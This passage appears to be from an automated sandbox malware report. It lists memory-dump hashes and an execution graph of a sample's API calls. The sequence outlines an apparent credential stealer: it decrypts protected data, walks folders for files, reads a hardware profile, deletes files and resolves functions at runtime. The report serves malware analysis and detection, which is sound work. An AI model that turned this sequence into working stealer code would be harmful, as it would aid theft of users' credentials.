                                                  • Opcode Fuzzy Hash: 3ffa2fe6fe285ec123b1f6e6eba041b3a10071a9a7a5173114cd42b977712374
                                                  • Instruction Fuzzy Hash: 3DC01232040108BBCB026A80C800E09BF2AAB04290F108009FB040D121D273D522ABC2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2dcff877db65c50921c4562d71a10239c62db4310f8d3c2e1966dae863b5b134
                                                  • Instruction ID: 90597efc4dbc9333abe8d7911518ae75d3d69e12c4f119df279f1b64f9b78169
                                                  • Opcode Fuzzy Hash: 2dcff877db65c50921c4562d71a10239c62db4310f8d3c2e1966dae863b5b134
                                                  • Instruction Fuzzy Hash: C7C09B760252059ECA05A758C584D16BED5FF65300F44DC5A7184C7230C631C91DD75A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0a63455bc655511eb532b18c38363e13c38792e9d4f8a712254a6a0b5709d625
                                                  • Instruction ID: 8792427a8e012c026edf73be2a74e27ffc43cb07f71e4dc0aaced60ceceb2dd1
                                                  • Opcode Fuzzy Hash: 0a63455bc655511eb532b18c38363e13c38792e9d4f8a712254a6a0b5709d625
                                                  • Instruction Fuzzy Hash: 01C002352854459FD710DB68D489EA4BBB1EF45219F2982F8E04E8BA23C766A855CB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction ID: d77331d01c494b34a0a1ba301ee13a1f87b48ddd987b2ac5f525b7548dd93187
                                                  • Opcode Fuzzy Hash: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction Fuzzy Hash: F2C092351845098FC310AB68D84CFA077EAEF45605F0980F0E10C8BB33DA22F8408B44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e807ac0fa1546972cc277efd9d993f4433f1f86f11eaa44d7e44575185469055
                                                  • Instruction ID: 3021d84b9f0a75f24d82cd36e702420dc3573853d0a2f8ddb6bc8f0f9b64e848
                                                  • Opcode Fuzzy Hash: e807ac0fa1546972cc277efd9d993f4433f1f86f11eaa44d7e44575185469055
                                                  • Instruction Fuzzy Hash: 65C04C345143158ACF19EF38C4616257B71FF5020A3945DADD08D4D755C737D485CB41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction ID: d77331d01c494b34a0a1ba301ee13a1f87b48ddd987b2ac5f525b7548dd93187
                                                  • Opcode Fuzzy Hash: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction Fuzzy Hash: F2C092351845098FC310AB68D84CFA077EAEF45605F0980F0E10C8BB33DA22F8408B44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0fa5e79cf900c6a05e7b71941b1236ba5ac61009e7b74fd5891754fff93454c4
                                                  • Instruction ID: eaef3481b506a7fe8450ca327f1e9a4dc2fa070c214e53c189ed95ee39b2c459
                                                  • Opcode Fuzzy Hash: 0fa5e79cf900c6a05e7b71941b1236ba5ac61009e7b74fd5891754fff93454c4
                                                  • Instruction Fuzzy Hash: F4900217790528010811319DB00019E530985C0C76190D077D64DC45044915959B4696
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 757676bf54d2acb39ab08b61092dcab20279c46535671de318fae1755b14184c
                                                  • Instruction ID: f8862b7b1460fb3e7ce5eeb40336516da56f1dcb7b63e23b8ae4b5da1b66cb2d
                                                  • Opcode Fuzzy Hash: 757676bf54d2acb39ab08b61092dcab20279c46535671de318fae1755b14184c
                                                  • Instruction Fuzzy Hash:
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Huq$Huq$Huq$Huq$Huq
                                                  • API String ID: 0-117896378
                                                  • Opcode ID: aa0d7655b9af1556726ff29c6fb67f7436ba0dd2eb711407b3d28bd8972053ef
                                                  • Instruction ID: 5e938ecbb6059b527d25ec4bc3f58c951f1a097a95facec85d83e74bd0e70e52
                                                  • Opcode Fuzzy Hash: aa0d7655b9af1556726ff29c6fb67f7436ba0dd2eb711407b3d28bd8972053ef
                                                  • Instruction Fuzzy Hash: 50323274F002588FDB64DF68C4947AEBBF2AF84300F1485A9D449AB395EB34AD45CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40b77534b5c39a4a76015d33200aea18ca1c94d04cb2c2a8858afb70f0b2a15c
                                                  • Instruction ID: f0d1febdaecfc52d9c32034cbd09b24d6ab15ce86b38b859adc2dec400be08f9
                                                  • Opcode Fuzzy Hash: 40b77534b5c39a4a76015d33200aea18ca1c94d04cb2c2a8858afb70f0b2a15c
                                                  • Instruction Fuzzy Hash: DE1272B04097468EE724CF65ED5C18A7BB1FB85B2CB504A0DD2A12F2E2DBBC155ACF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c8a93743b7725598bddf36f84330443db04eaaa040b5a2a3f7e252a438e7fbb
                                                  • Instruction ID: df73ae61e1ebcbfb8758ee8322b46c684b3eabcfef9b3ff65717636c6f76ce0b
                                                  • Opcode Fuzzy Hash: 3c8a93743b7725598bddf36f84330443db04eaaa040b5a2a3f7e252a438e7fbb
                                                  • Instruction Fuzzy Hash: 7BC11A71E002589FCB25DF65C880B99FBF2BF84310F14C5AAD449AB295E734E985CF61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c04e17039baba9bc735023f315af20ab8fadfa2cd305c0a4c12c2052d1caccb
                                                  • Instruction ID: f0fac4ec2be78d3f4f687de9e52c490575bc23145b25fe265d6b2e7520228cc2
                                                  • Opcode Fuzzy Hash: 0c04e17039baba9bc735023f315af20ab8fadfa2cd305c0a4c12c2052d1caccb
                                                  • Instruction Fuzzy Hash: 1AD1FB3191075A8ACB10EB64D994AADF7B1FFD5300F10CB9AE50977250EB70AAC9CF91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e2ef3f7ca4b1206887be0e1fceb5556d22e952314c7ed91718b0874d2623c0b
                                                  • Instruction ID: 33ee6c721583e576937b08436cdf6060b5ee8860c18e9e4e0dbbba4105ca4c7b
                                                  • Opcode Fuzzy Hash: 0e2ef3f7ca4b1206887be0e1fceb5556d22e952314c7ed91718b0874d2623c0b
                                                  • Instruction Fuzzy Hash: C9D1EA3191076A8ACB10EB64D994A9DF7B1FFD5300F10CB9AE50977250EB70AAC9CF91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 067c92f468ec69d2b626f52e35ba412cc17925e37ff835148c003412dc02057b
                                                  • Instruction ID: 1b83e59741058d136690b65647655cbd7e12a5e1a1e48dcda98433581aac8ad8
                                                  • Opcode Fuzzy Hash: 067c92f468ec69d2b626f52e35ba412cc17925e37ff835148c003412dc02057b
                                                  • Instruction Fuzzy Hash: C2A14D36A002198FCF15DFA4C84459EB7B2FF85300B15856DE80AEB365DB75E949CF80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5162f1f24d86acca33bca75badd7b2f671e40c30af503a5ca3a3477ba0ffe23a
                                                  • Instruction ID: edd9b396b36c6ac1e3be5fa04894416fc0c4da4d6db4039715beec63f76f58ed
                                                  • Opcode Fuzzy Hash: 5162f1f24d86acca33bca75badd7b2f671e40c30af503a5ca3a3477ba0ffe23a
                                                  • Instruction Fuzzy Hash: FCC1E3B08057468ED725CF64EC5818A7BB1FB85B28F504B1DD2A16F2E2DBBC158ACF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6971ca33b96b776028f1d6c3d826d03be8633702e9764c766066472ef6cfcf55
                                                  • Instruction ID: 57e5ecc0883ea9592d9fd266552e99482d9da2d21601d560ed189ff112640b70
                                                  • Opcode Fuzzy Hash: 6971ca33b96b776028f1d6c3d826d03be8633702e9764c766066472ef6cfcf55
                                                  • Instruction Fuzzy Hash: D0819272D00609CACB14DFA9D8442EEFBB2FF84340F25C139D455EB659EB39965ACB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed3a87ca8df321a87255f4788780cf49f9a33889c071642d658993704e5116ae
                                                  • Instruction ID: f2d525fbdc12cc84b60080e423873463b2f0b551bd47e5fea4b144a3806185bf
                                                  • Opcode Fuzzy Hash: ed3a87ca8df321a87255f4788780cf49f9a33889c071642d658993704e5116ae
                                                  • Instruction Fuzzy Hash: BF81AC72D00609CBCB10DFA9D8442EEFBB2FF84300F19C13AD455AB698EB399656CB41
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2758482617.0000000000B01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B00000, based on PE: true
                                                  • Associated: 00000002.00000002.2758458592.0000000000B00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758642770.0000000000D69000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758817944.0000000000FE0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758838462.0000000000FE3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758857400.0000000000FE4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758873266.0000000000FE5000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758900186.000000000100C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758922264.0000000001018000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758944124.0000000001019000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758961557.000000000101A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758980546.000000000101C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758980546.0000000001037000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758980546.000000000103D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758980546.00000000010A5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2759078097.00000000010AC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2759078097.00000000010BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2759078097.0000000001142000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2759240821.00000000012E2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2759254305.00000000012E3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2759254305.00000000012EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_b00000_y5cm2yzz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b65c2346c372a812bf9a5a497f7710ebe99c163a2b211cbfcde99684ffbfdf79
                                                  • Instruction ID: 21395c888a9d69e7e5649a6c1fae996b6df5f624e5ec49af13195a06cd8b41d3
                                                  • Opcode Fuzzy Hash: b65c2346c372a812bf9a5a497f7710ebe99c163a2b211cbfcde99684ffbfdf79
                                                  • Instruction Fuzzy Hash: EF317A2791CFC482D3218B24F5413AAB364F7A9794F15A715EFC852A1ADF38E2E5CB40
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2758482617.0000000000B01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B00000, based on PE: true
                                                  • Associated: 00000002.00000002.2758458592.0000000000B00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758642770.0000000000D69000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758817944.0000000000FE0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758838462.0000000000FE3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758857400.0000000000FE4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758873266.0000000000FE5000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758900186.000000000100C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758922264.0000000001018000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758944124.0000000001019000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758961557.000000000101A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758980546.000000000101C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758980546.0000000001037000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758980546.000000000103D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2758980546.00000000010A5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2759078097.00000000010AC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2759078097.00000000010BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2759078097.0000000001142000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2759240821.00000000012E2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2759254305.00000000012E3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2759254305.00000000012EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_b00000_y5cm2yzz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 19322aacc7dd447383d6f2170a10e82d5a65409c32a3e247da5a00b3a98942e9
                                                  • Instruction ID: 2ca65e79790d41de0e54a98060c9f0a6312f0d0bdbdba1829bd8450aff48c7f8
                                                  • Opcode Fuzzy Hash: 19322aacc7dd447383d6f2170a10e82d5a65409c32a3e247da5a00b3a98942e9
                                                  • Instruction Fuzzy Hash:

                                                  Execution Graph

                                                  Execution Coverage:19.4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:14.7%
                                                  Total number of Nodes:381
                                                  Total number of Limit Nodes:12
                                                  execution_graph 2493 2c2c09 2494 2c2cd5 2493->2494 2499 2c2c16 2493->2499 2495 2c2d08 2494->2495 2496 2c2d29 2494->2496 2500 2c2c9c 2494->2500 2505 2c1ee0 2495->2505 2508 2c2060 2496->2508 2499->2500 2501 2c2c88 2499->2501 2503 2c2c9e 2499->2503 2501->2500 2502 2c2c94 ExitProcess 2501->2502 2503->2500 2504 2c2cbc ExitProcess 2503->2504 2506 2c1f07 2505->2506 2507 2c1ef1 RtlFreeHeap 2505->2507 2506->2500 2507->2506 2509 2c206d 2508->2509 2513 2c2069 2508->2513 2510 2c2081 RtlReAllocateHeap 2509->2510 2511 2c2073 2509->2511 2510->2513 2514 2c1ea0 RtlAllocateHeap 2511->2514 2513->2500 2514->2513 2959 2c177a 2961 2c174c 2959->2961 2960 2c17e0 3 API calls 2960->2961 2961->2960 2962 2c17b5 2961->2962 2963 2c1897 2965 2c1845 2963->2965 2964 2c18e8 2966 2c188c 2965->2966 2968 2c18a2 GlobalHandle 2965->2968 2966->2964 2967 2c19f7 LoadLibraryA GetProcAddress 2966->2967 2967->2964 2968->2965 2515 2c1d30 CreateMutexA 2516 2c1d5f 2515->2516 2517 2c1d52 GetLastError 2515->2517 2517->2516 2518 2c1d64 2517->2518 2528 2c1ca0 2518->2528 2520 2c1d86 2539 2c30c0 2520->2539 2522 2c1e27 2557 2c1c80 2522->2557 2524 2c1e17 Sleep 2526 2c1da0 2524->2526 2525 2c1e33 CloseHandle ExitProcess 2526->2522 2526->2524 2550 2c3c50 2526->2550 2564 2c16e0 2528->2564 2531 2c1cce ExitProcess 2535 2c1cba 2535->2531 2585 2c2810 2535->2585 2538 2c1cd6 2538->2520 2868 2c1470 2539->2868 2541 2c30ce 2889 2c1ea0 RtlAllocateHeap 2541->2889 2543 2c30db 2544 2c8b90 GetCurrentHwProfileA 2543->2544 2549 2c31a1 2543->2549 2545 2c3112 2544->2545 2890 2c31b0 2545->2890 2547 2c3147 2548 2c2b10 3 API calls 2547->2548 2548->2549 2549->2526 2922 2c1ea0 RtlAllocateHeap 2550->2922 2552 2c3c63 2553 2c8b90 GetCurrentHwProfileA 2552->2553 2556 2c3d1a 2552->2556 2554 2c3c9a 2553->2554 2555 2c2b10 3 API calls 2554->2555 2555->2556 2556->2526 2923 2c29e0 2557->2923 2559 2c1c8c 2929 2c3ee0 2559->2929 2563 2c1c99 2563->2525 2590 2c1c40 2564->2590 2568 2c16f0 2572 2c16f4 2568->2572 2596 2c17e0 2568->2596 2570 2c170b 2571 2c17e0 3 API calls 2570->2571 2570->2572 2571->2570 2572->2531 2573 2c1e50 HeapCreate 2572->2573 2574 2c1cb1 2573->2574 2574->2531 2575 2c3d50 2574->2575 2604 2c3ef0 VirtualAlloc 2575->2604 2578 2c3d68 2608 2c43e0 2578->2608 2579 2c3d74 2615 2c1ea0 RtlAllocateHeap 2579->2615 2581 2c3d6d 2581->2535 2583 2c3d82 2584 2c1ee0 RtlFreeHeap 2583->2584 2584->2581 2586 2c2848 2585->2586 2587 2c28c5 CreateThread 2586->2587 2589 2c1cc7 2586->2589 2588 2c28eb CreateThread 2587->2588 2587->2589 2622 2c2db0 2587->2622 2588->2589 2616 2c2e60 2588->2616 2589->2531 2589->2538 2591 2c1c47 CryptSignHashA CryptUpdateProtectedState WinHttpTimeFromSystemTime 2590->2591 2592 2c16eb 2590->2592 2591->2592 2593 2c1a40 2592->2593 2603 2c1a20 GetPEB 2593->2603 2595 2c1a55 2595->2568 2597 2c1845 2596->2597 2600 2c18a2 GlobalHandle 2597->2600 2601 2c188c 2597->2601 2598 2c18e8 2598->2570 2599 2c19f7 LoadLibraryA GetProcAddress 2599->2598 2600->2597 2601->2598 2601->2599 2602 2c19f1 2601->2602 2602->2599 2603->2595 2605 2c3f16 VirtualAlloc 2604->2605 2606 2c3d5b 2604->2606 2605->2606 2607 2c3f39 VirtualAlloc 2605->2607 2606->2578 2606->2579 2607->2606 2609 2c43ec VirtualFree 2608->2609 2610 2c43ff 2608->2610 2609->2610 2611 2c441c 2610->2611 2612 2c4408 VirtualFree 2610->2612 2613 2c4439 2611->2613 2614 2c4425 VirtualFree 2611->2614 2612->2611 2613->2581 2614->2613 2615->2583 2620 2c2e6d 2616->2620 2617 2c30af 2618 2c309f Sleep 2618->2620 2620->2617 2620->2618 2628 2c1ea0 RtlAllocateHeap 2620->2628 2629 2c2920 2620->2629 2623 2c2db4 2622->2623 2624 2c2e4c 2623->2624 2625 2c2e3c Sleep 2623->2625 2627 2c2920 RtlFreeHeap 2623->2627 2637 2c2590 2623->2637 2625->2623 2627->2623 2628->2620 2630 2c2935 2629->2630 2636 2c29ca 2629->2636 2631 2c1ee0 RtlFreeHeap 2630->2631 2632 2c2949 2631->2632 2633 2c1ee0 RtlFreeHeap 2632->2633 2634 2c2960 2633->2634 2635 2c1ee0 RtlFreeHeap 2634->2635 2635->2636 2636->2620 2639 2c259c 2637->2639 2638 2c25a2 2638->2623 2639->2638 2640 2c2629 2639->2640 2641 2c26ba 2639->2641 2660 2c1ea0 RtlAllocateHeap 2640->2660 2643 2c26cc 2641->2643 2644 2c275d 2641->2644 2670 2c1ea0 RtlAllocateHeap 2643->2670 2657 2c2692 2644->2657 2678 2c1ea0 RtlAllocateHeap 2644->2678 2645 2c2648 2661 2c1060 2645->2661 2648 2c26eb 2671 2c12f0 2648->2671 2649 2c278e 2679 2c1000 CryptUnprotectData 2649->2679 2654 2c1ee0 RtlFreeHeap 2654->2657 2656 2c1ee0 RtlFreeHeap 2656->2657 2659 2c1ee0 RtlFreeHeap 2659->2657 2660->2645 2662 2c10a4 2661->2662 2663 2c1085 SHGetFolderPathW 2661->2663 2683 2c8d40 2662->2683 2663->2662 2666 2c10f3 2666->2654 2668 2c10da 2699 2c2b10 2668->2699 2670->2648 2672 2c1327 2671->2672 2673 2c1307 SHGetFolderPathW 2671->2673 2674 2c8d40 11 API calls 2672->2674 2673->2672 2675 2c134c 2674->2675 2676 2c1366 2675->2676 2827 2c3a20 2675->2827 2676->2656 2678->2649 2680 2c103d 2679->2680 2681 2c104e 2679->2681 2856 2c32a0 2680->2856 2681->2659 2709 2c1ea0 RtlAllocateHeap 2683->2709 2685 2c8d53 2686 2c10c8 2685->2686 2710 2c2360 2685->2710 2686->2666 2698 2c1ec0 RtlSizeHeap 2686->2698 2689 2c8ec9 2690 2c1ee0 RtlFreeHeap 2689->2690 2690->2686 2691 2c8ea6 FindNextFileW 2693 2c8ebf FindClose 2691->2693 2694 2c8d95 2691->2694 2692 2c2360 2 API calls 2692->2694 2693->2689 2694->2689 2694->2691 2694->2692 2695 2c8d40 8 API calls 2694->2695 2715 2c1380 2694->2715 2724 2c1110 2694->2724 2695->2694 2698->2668 2820 2c2a60 2699->2820 2703 2c2b2d 2704 2c2b4f 2703->2704 2705 2c2bb0 2703->2705 2707 2c1ee0 RtlFreeHeap 2704->2707 2706 2c2920 RtlFreeHeap 2705->2706 2708 2c2b99 2706->2708 2707->2708 2708->2666 2709->2685 2713 2c2372 2710->2713 2711 2c2570 FindFirstFileW 2711->2694 2713->2711 2714 2c1ee0 RtlFreeHeap 2713->2714 2737 2c1ea0 RtlAllocateHeap 2713->2737 2714->2713 2716 2c139d 2715->2716 2722 2c13e0 2715->2722 2717 2c140a 2716->2717 2718 2c13d5 2716->2718 2738 2c1ec0 RtlSizeHeap 2717->2738 2739 2c1ea0 RtlAllocateHeap 2718->2739 2721 2c1415 2721->2722 2723 2c2060 2 API calls 2721->2723 2722->2694 2723->2722 2725 2c12e2 2724->2725 2726 2c112d 2724->2726 2725->2694 2727 2c1189 2726->2727 2730 2c11b0 2726->2730 2744 2c36d0 2727->2744 2729 2c11a8 2731 2c1ee0 RtlFreeHeap 2729->2731 2730->2729 2735 2c120e 2730->2735 2740 2c90b0 2730->2740 2731->2725 2733 2c36d0 7 API calls 2734 2c12a2 2733->2734 2734->2729 2736 2c12c8 DeleteFileW 2734->2736 2735->2729 2735->2733 2736->2729 2737->2713 2738->2721 2739->2722 2741 2c90c8 2740->2741 2743 2c90e0 2741->2743 2759 2c2200 2741->2759 2743->2735 2745 2c36ee 2744->2745 2764 2c8b90 GetCurrentHwProfileA 2745->2764 2747 2c3702 2766 2c38c0 2747->2766 2750 2c379b 2750->2729 2751 2c37fa 2754 2c37ef 2751->2754 2799 2c1ea0 RtlAllocateHeap 2751->2799 2752 2c37b4 2784 2c34a0 2752->2784 2755 2c1ee0 RtlFreeHeap 2754->2755 2755->2750 2757 2c3820 2757->2754 2758 2c2b10 3 API calls 2757->2758 2758->2754 2760 2c220f 2759->2760 2763 2c1ea0 RtlAllocateHeap 2760->2763 2762 2c2223 2762->2743 2763->2762 2765 2c8baa 2764->2765 2765->2747 2767 2c38f8 2766->2767 2774 2c3791 2766->2774 2767->2774 2800 2c8f20 2767->2800 2769 2c3934 2770 2c3940 2769->2770 2771 2c3953 2769->2771 2772 2c1ee0 RtlFreeHeap 2770->2772 2809 2c1ea0 RtlAllocateHeap 2771->2809 2772->2774 2774->2750 2774->2751 2774->2752 2775 2c3965 2810 2c7d10 2775->2810 2777 2c39a0 2778 2c39de 2777->2778 2779 2c39ae 2777->2779 2780 2c1ee0 RtlFreeHeap 2778->2780 2782 2c1ee0 RtlFreeHeap 2779->2782 2780->2774 2781 2c3972 2781->2777 2814 2c80d0 2781->2814 2782->2774 2785 2c3548 2784->2785 2786 2c34ba 2784->2786 2818 2c1ec0 RtlSizeHeap 2785->2818 2817 2c1ea0 RtlAllocateHeap 2786->2817 2789 2c3573 2790 2c35a1 2789->2790 2791 2c3614 2789->2791 2792 2c35bf 2790->2792 2793 2c2b10 3 API calls 2790->2793 2819 2c1ec0 RtlSizeHeap 2791->2819 2794 2c34a0 5 API calls 2792->2794 2793->2792 2798 2c34cc 2794->2798 2796 2c3622 2797 2c2060 